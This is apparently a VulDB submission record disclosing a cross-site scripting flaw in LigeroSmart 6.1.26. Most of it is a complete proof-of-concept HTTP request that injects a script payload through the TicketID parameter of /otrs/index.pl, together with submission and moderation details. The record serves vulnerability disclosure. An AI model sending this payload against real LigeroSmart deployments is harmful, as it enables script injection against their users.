| Title | LigeroSmart 6.1.26 Cross Site Scripting |
|---|
| Description | It was identified that the TicketID parameter allows for cross-site scripting.
POST /otrs/index.pl HTTP/1.1
Content-Type: multipart/form-data; boundary=----------YWJkMTQzNDcw
Referer: http://192.168.12.212/otrs/index.pl
Cookie: OTRSAgentInterface=2gHtFoG2h2zqFgLp8ZG1PJLBN8aaaZsd
Content-Length: 458
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36
Host: 192.168.12.212
Connection: Keep-alive
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="Action"
AgentTicketBulk
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="ChallengeToken"
XeWmehc6OomplK79F9jNC7Dv2VSk6uZC
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="LastColumnFilter"
aYlNlfdX
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="TicketID"
1</script><script>alert(document.domain)</script>
------------YWJkMTQzNDcw--
Docker was installed and tests were performed.
https://github.com/LigeroSmart/docker-ligerosmart |
|---|
| Source | ⚠️ https://github.com/LigeroSmart/ligerosmart/issues/280 |
|---|
| User | chor4o (UID 52584) |
|---|
| Submission | 01/02/2026 16:24 (4 months ago) |
|---|
| Moderation | 01/16/2026 17:38 (14 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 341601 [LigeroSmart up to 6.1.26 /otrs/index.pl TicketID cross site scripting] |
|---|
| Points | 20 |
|---|